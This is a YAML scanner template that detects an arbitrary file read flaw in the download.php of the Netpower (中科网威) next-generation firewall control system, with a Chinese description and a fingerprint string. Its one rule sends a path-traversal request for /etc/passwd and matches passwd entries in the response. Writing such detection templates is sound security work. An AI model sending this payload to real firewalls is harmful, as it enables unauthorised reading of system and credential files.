id: netpower-download-php-file-read

info:
  name: 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞, 攻击者通过漏洞可以读取服务器上的文件
    body="Get_Verify_Info(hex_md5(user_string)."
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E4%B8%AD%E7%A7%91%E7%BD%91%E5%A8%81/%E4%B8%AD%E7%A7%91%E7%BD%91%E5%A8%81%20%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()